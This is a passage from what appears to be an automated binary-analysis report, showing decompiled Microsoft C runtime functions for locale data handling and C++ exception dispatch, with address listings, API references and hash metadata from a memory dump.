				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t235 = E6E544550(1, 0x50);
					_v8 = _t235;
					E6E541B83(0);
					if(_t235 != 0) {
						_t228 = E6E544550(1, 4);
						_v12 = _t228;
						E6E541B83(0);
						if(_t228 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0x6e688c80, _t212 << 2);
								L24:
								_t237 = _v8;
								_t232 = _v16;
								 *_t237 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t237 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t237 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t237 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t237 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t232 != 0) {
									 *_t232 = 1;
								}
								goto L26;
							}
							_t233 = E6E544550(1, 4);
							_v16 = _t233;
							E6E541B83(0);
							if(_t233 != 0) {
								_t234 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t235 + 0xc; // 0xc
								_t116 = E6E5466AC(_t209, _t225, _t234);
								_t118 = E6E5466AC(_t209, _t225, _t234,  &_v28, 1, _t234, 0x14, _v8 + 0x10,  &_v28);
								_t122 = E6E5466AC(_t209, _t225, _t234,  &_v28, 1, _t234, 0x16, _v8 + 0x14, 1);
								_t126 = E6E5466AC(_t209, _t225, _t234,  &_v28, 1, _t234, 0x17, _v8 + 0x18, _t234);
								_v20 = _v8 + 0x1c;
								_t130 = E6E5466AC(_t209, _t225, _t234,  &_v28, 1, _t234, 0x18, _v8 + 0x1c, 0x15);
								_t134 = E6E5466AC(_t209, _t225, _t234,  &_v28, 1, _t234, 0x50, _v8 + 0x20, _t14);
								_t138 = E6E5466AC(_t209, _t225, _t234);
								_t142 = E6E5466AC(_t209, _t225, _t234,  &_v28, 0, _t234, 0x1a, _v8 + 0x28,  &_v28);
								_t146 = E6E5466AC(_t209, _t225, _t234,  &_v28, 0, _t234, 0x19, _v8 + 0x29, 1);
								_t150 = E6E5466AC(_t209, _t225, _t234,  &_v28, 0, _t234, 0x54, _v8 + 0x2a, _t234);
								_t154 = E6E5466AC(_t209, _t225, _t234,  &_v28, 0, _t234, 0x55, _v8 + 0x2b, 0x51);
								_t158 = E6E5466AC(_t209, _t225, _t234,  &_v28, 0, _t234, 0x56, _v8 + 0x2c, _v8 + 0x24);
								_t162 = E6E5466AC(_t209, _t225, _t234);
								_t166 = E6E5466AC(_t209, _t225, _t234,  &_v28, 0, _t234, 0x52, _v8 + 0x2e,  &_v28);
								_t170 = E6E5466AC(_t209, _t225, _t234,  &_v28, 0, _t234, 0x53, _v8 + 0x2f, 0);
								_t174 = E6E5466AC(_t209, _t225, _t234,  &_v28, 2, _t234, 0x15, _v8 + 0x38, _t234);
								_t178 = E6E5466AC(_t209, _t225, _t234,  &_v28, 2, _t234, 0x14, _v8 + 0x3c, 0x57);
								_t182 = E6E5466AC(_t209, _t225, _t234,  &_v28, 2, _t234, 0x16, _v8 + 0x40, _v8 + 0x2d);
								_push(_v8 + 0x44);
								_push(0x17);
								_push(_t234);
								_t186 = E6E5466AC(_t209, _t225, _t234);
								_t190 = E6E5466AC(_t209, _t225, _t234,  &_v28, 2, _t234, 0x50, _v8 + 0x48,  &_v28);
								if((E6E5466AC(_t209, _t225, _t234,  &_v28, 2, _t234, 0x51, _v8 + 0x4c, 2) | _t116 | _t118 | _t122 | _t126 | _t130 | _t134 | _t138 | _t142 | _t146 | _t150 | _t154 | _t158 | _t162 | _t166 | _t170 | _t174 | _t178 | _t182 | _t186 | _t190) == 0) {
									_t227 =  *_v20;
									while(1) {
										_t196 =  *_t227;
										if(_t196 == 0) {
											break;
										}
										_t61 = _t196 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t196 != 0x3b) {
												L16:
												_t227 = _t227 + 1;
												continue;
											}
											_t258 = _t227;
											do {
												_t222 =  *((intOrPtr*)(_t258 + 1));
												 *_t258 = _t222;
												_t258 = _t258 + 1;
											} while (_t222 != 0);
											continue;
										}
										 *_t227 = _t221;
										goto L16;
									}
									goto L24;
								}
								E6E54D3A3(_v8);
								E6E541B83(_v8);
								E6E541B83(_v12);
								E6E541B83(_v16);
								goto L4;
							}
							E6E541B83(_t235);
							E6E541B83(_v12);
							L7:
							goto L4;
						}
						E6E541B83(_t235);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t232 = 0;
					_v12 = 0;
					_t237 = 0x6e688c80;
					L26:
					_t106 =  *(_t209 + 0x84);
					if(_t106 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t106 | 0xffffffff) == 0) {
							E6E541B83( *(_t209 + 0x88));
							E6E541B83( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t232;
					 *(_t209 + 0x88) = _t237;
					return 0;
				}
			}

0x6e54d4a1
0x6e54d4aa
0x6e54d4b1
0x6e54d4b4
0x6e54d4b7
0x6e54d4c0
0x6e54d4e2
0x6e54d4e6
0x6e54d4e9
0x6e54d4f3
0x6e54d506
0x6e54d50a
0x6e54d50d
0x6e54d517
0x6e54d529
0x6e54d7bb
0x6e54d7bc
0x6e54d7be
0x6e54d7c6
0x6e54d7ca
0x6e54d7cf
0x6e54d7da
0x6e54d7e6
0x6e54d7f2
0x6e54d7fe
0x6e54d804
0x6e54d808
0x6e54d80a
0x6e54d80a
0x00000000
0x6e54d808
0x6e54d538
0x6e54d53c
0x6e54d53f
0x6e54d549
0x6e54d55d
0x6e54d563
0x6e54d570
0x6e54d587
0x6e54d59e
0x6e54d5b5
0x6e54d5c5
0x6e54d5d2
0x6e54d5e9
0x6e54d600
0x6e54d617
0x6e54d631
0x6e54d648
0x6e54d65f
0x6e54d676
0x6e54d690
0x6e54d6a7
0x6e54d6be
0x6e54d6d5
0x6e54d6ef
0x6e54d706
0x6e54d713
0x6e54d714
0x6e54d716
0x6e54d71d
0x6e54d734
0x6e54d758
0x6e54d786
0x6e54d795
0x6e54d795
0x6e54d799
0x00000000
0x00000000
0x6e54d78a
0x6e54d78a
0x6e54d790
0x6e54d79f
0x6e54d794
0x6e54d794
0x00000000
0x6e54d794
0x6e54d7a1
0x6e54d7a3
0x6e54d7a3
0x6e54d7a6
0x6e54d7a8
0x6e54d7ab
0x00000000
0x6e54d7af
0x6e54d792
0x00000000
0x6e54d792
0x00000000
0x6e54d79b
0x6e54d75e
0x6e54d764
0x6e54d76d
0x6e54d776
0x00000000
0x6e54d77b
0x6e54d54c
0x6e54d555
0x6e54d51f
0x00000000
0x6e54d51f
0x6e54d51a
0x00000000
0x6e54d51a
0x6e54d4f5
0x00000000
0x6e54d4ca
0x6e54d4ca
0x6e54d4cc
0x6e54d4cf
0x6e54d80c
0x6e54d80c
0x6e54d814
0x6e54d816
0x6e54d816
0x6e54d81e
0x6e54d823
0x6e54d827
0x6e54d82f
0x6e54d837
0x6e54d83d
0x6e54d827
0x6e54d841
0x6e54d846
0x6e54d84c
0x00000000
0x6e54d84c

APIs

_free.LIBCMT ref: 6E54D4E9
_free.LIBCMT ref: 6E54D50D
_free.LIBCMT ref: 6E54D51A
_free.LIBCMT ref: 6E54D53F
_free.LIBCMT ref: 6E54D54C
_free.LIBCMT ref: 6E54D555
_free.LIBCMT ref: 6E54D82F
_free.LIBCMT ref: 6E54D837

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 139bea91810ff91c2f090cebaea386504bdde35ac0a678ae4de9cc71b667232a
Instruction ID: 4e6ede42af4f8a1473e4024b95889cc9393c5997ddf4210c852616b915d01f07
Opcode Fuzzy Hash: 139bea91810ff91c2f090cebaea386504bdde35ac0a678ae4de9cc71b667232a
Instruction Fuzzy Hash: 74C111B6D40204EFDB10CBE8CD41FEA77FCAB49714F144565FA04EB285E6B19E448B60

Uniqueness

Uniqueness Score: -1.00%

Function 6E532898, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 304
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E532898(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6E5337F8(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6E5349C0(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6E532553(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6E532553(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6E53048F(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6E5303C2(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E532818(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6E5349C0(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6E532553(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6E532553(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6E532553(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6E532553(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6E5303C2(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6E532818(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6E5307FA(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6E532553(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6E5332A7(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6E532553(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6E532553(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6E532553(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6E532553(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6E5332A7(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6E53AAAD(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6E532F3B( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6e68a640) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6E5307FA(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6E532F23( &_v64);
											E6E530A4A( &_v64, 0x6e684384);
											L63:
											 *(E6E532553(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6E532553(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6E5305B5(_t279, _t319, _t274);
											E6E5331A7(_a8, _a16, _t305);
											_t235 = E6E533364(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6E53311E(_t274, _t279, _t300, _t305, _t319);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6e532898
0x6e53289f
0x6e5328a1
0x6e5328aa
0x6e5328b0
0x6e5328b8
0x6e5328ba
0x6e5328bd
0x6e5328c3
0x6e532c3c
0x6e532c3c
0x6e532c41
0x6e532c43
0x6e532c45
0x6e532c48
0x6e532c49
0x6e532c4c
0x6e532c52
0x6e532d71
0x6e532c58
0x6e532c58
0x6e532c59
0x6e532c5a
0x6e532c61
0x6e532c64
0x6e532c67
0x6e532c6d
0x6e532c6f
0x6e532c74
0x6e532c77
0x6e532c79
0x6e532c7f
0x6e532c81
0x6e532c87
0x6e532c9c
0x6e532ca1
0x6e532ca4
0x6e532ca6
0x6e532d6d
0x00000000
0x6e532d6e
0x6e532ca6
0x6e532c87
0x6e532c7f
0x6e532c77
0x6e532cac
0x6e532caf
0x6e532cb2
0x6e532cb5
0x6e532cb8
0x6e532cbe
0x6e532cd0
0x6e532cd5
0x6e532cd8
0x6e532cdb
0x6e532cde
0x6e532ce1
0x6e532ce4
0x6e532ce7
0x00000000
0x00000000
0x6e532ced
0x6e532ced
0x6e532cf0
0x6e532cf3
0x6e532d02
0x6e532d03
0x6e532d03
0x6e532d05
0x6e532d08
0x00000000
0x00000000
0x6e532d0a
0x6e532d0d
0x00000000
0x00000000
0x6e532d1b
0x6e532d1d
0x6e532d20
0x6e532d22
0x6e532d2a
0x6e532d2a
0x6e532d2d
0x6e532d2f
0x6e532d31
0x6e532d4d
0x6e532d52
0x6e532d55
0x6e532d55
0x00000000
0x6e532d2d
0x6e532d24
0x6e532d28
0x00000000
0x00000000
0x00000000
0x6e532d58
0x6e532d5b
0x6e532d5c
0x6e532d5f
0x6e532d62
0x6e532d65
0x6e532d68
0x6e532d68
0x00000000
0x6e532cf3
0x6e532d72
0x6e532d77
0x6e532d78
0x6e532d7b
0x6e532d7e
0x6e532d7f
0x6e532d80
0x6e532d81
0x6e532d84
0x6e532d86
0x6e532dfe
0x6e532e00
0x6e532e00
0x6e532d88
0x6e532d88
0x6e532d8b
0x6e532d8e
0x00000000
0x6e532d90
0x6e532d90
0x6e532d93
0x6e532d96
0x6e532d9d
0x6e532d9d
0x6e532da0
0x6e532da2
0x6e532da4
0x6e532dd6
0x6e532dd6
0x6e532dd9
0x6e532de0
0x6e532de0
0x6e532de3
0x6e532de6
0x6e532ded
0x6e532ded
0x6e532df0
0x6e532df7
0x6e532df9
0x6e532df9
0x6e532df2
0x6e532df2
0x6e532df5
0x00000000
0x00000000
0x6e532df5
0x6e532de8
0x6e532de8
0x6e532deb
0x00000000
0x00000000
0x6e532deb
0x6e532ddb
0x6e532ddb
0x6e532dde
0x00000000
0x00000000
0x6e532dde
0x6e532dfa
0x6e532da6
0x6e532da6
0x6e532da6
0x6e532da9
0x6e532da9
0x6e532dab
0x6e532dad
0x00000000
0x00000000
0x6e532daf
0x6e532db1
0x6e532dc5
0x6e532dc5
0x6e532db3
0x6e532db3
0x6e532db6
0x6e532db9
0x00000000
0x6e532dbb
0x6e532dbb
0x6e532dbe
0x6e532dc1
0x6e532dc3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e532dc3
0x6e532db9
0x6e532dce
0x6e532dce
0x6e532dd0
0x00000000
0x6e532dd2
0x6e532dd2
0x6e532dd2
0x00000000
0x6e532dd0
0x6e532dc9
0x6e532dcb
0x6e532dcb
0x00000000
0x6e532dcb
0x6e532d98
0x6e532d98
0x6e532d9b
0x00000000
0x00000000
0x00000000
0x00000000
0x6e532d9b
0x6e532d96
0x6e532d8e
0x6e532e01
0x6e532e05
0x6e532e05
0x6e5328d2
0x6e5328d2
0x6e5328db
0x6e5329d8
0x6e5329d8
0x6e5329db
0x00000000
0x6e53290a
0x6e53290a
0x6e53290f
0x00000000
0x6e532915
0x6e532915
0x6e53291d
0x6e532bd6
0x6e532bda
0x6e532923
0x6e532928
0x6e53292b
0x6e532930
0x6e532937
0x6e53293c
0x00000000
0x6e532974
0x6e53297c
0x6e5329e0
0x6e5329e0
0x6e5329e3
0x6e5329e6
0x6e5329e8
0x6e5329eb
0x6e5329ee
0x6e5329f4
0x6e532ba5
0x6e532ba5
0x6e532ba8
0x00000000
0x6e532baa
0x6e532baa
0x6e532bad
0x00000000
0x6e532bb3
0x6e532bb3
0x6e532bb6
0x6e532bb9
0x6e532bba
0x6e532bbb
0x6e532bbe
0x6e532bbf
0x6e532bc2
0x6e532bc3
0x6e532bc8
0x00000000
0x6e532bc8
0x6e532bad
0x6e5329fa
0x6e5329fa
0x6e5329fe
0x00000000
0x6e532a04
0x6e532a04
0x6e532a0b
0x6e532a23
0x6e532a23
0x6e532a26
0x6e532a29
0x6e532a2f
0x6e532a3f
0x6e532a44
0x6e532a47
0x6e532a4a
0x6e532a4d
0x6e532a50
0x6e532a53
0x6e532a56
0x6e532a5c
0x6e532a5c
0x6e532a5f
0x6e532a62
0x6e532a71
0x6e532a72
0x6e532a72
0x6e532a74
0x6e532a77
0x6e532a7d
0x6e532a80
0x6e532a86
0x6e532a88
0x6e532a8b
0x6e532a8e
0x6e532a97
0x6e532a9a
0x6e532a9c
0x6e532a9c
0x6e532a9f
0x6e532aa2
0x6e532aa5
0x6e532aa8
0x6e532aab
0x6e532ab0
0x6e532ab1
0x6e532ab2
0x6e532ab3
0x6e532ab4
0x6e532ab7
0x6e532ab9
0x6e532abb
0x00000000
0x6e532abd
0x6e532abd
0x6e532abd
0x6e532ac0
0x6e532ac3
0x6e532ac5
0x6e532ac6
0x6e532acb
0x6e532ace
0x6e532ad0
0x00000000
0x00000000
0x6e532ad2
0x6e532ad3
0x6e532ad6
0x6e532ad8
0x00000000
0x6e532ada
0x6e532ada
0x6e532add
0x6e532ae0
0x00000000
0x6e532ae0
0x00000000
0x6e532ad8
0x6e532af4
0x6e532afa
0x6e532b17
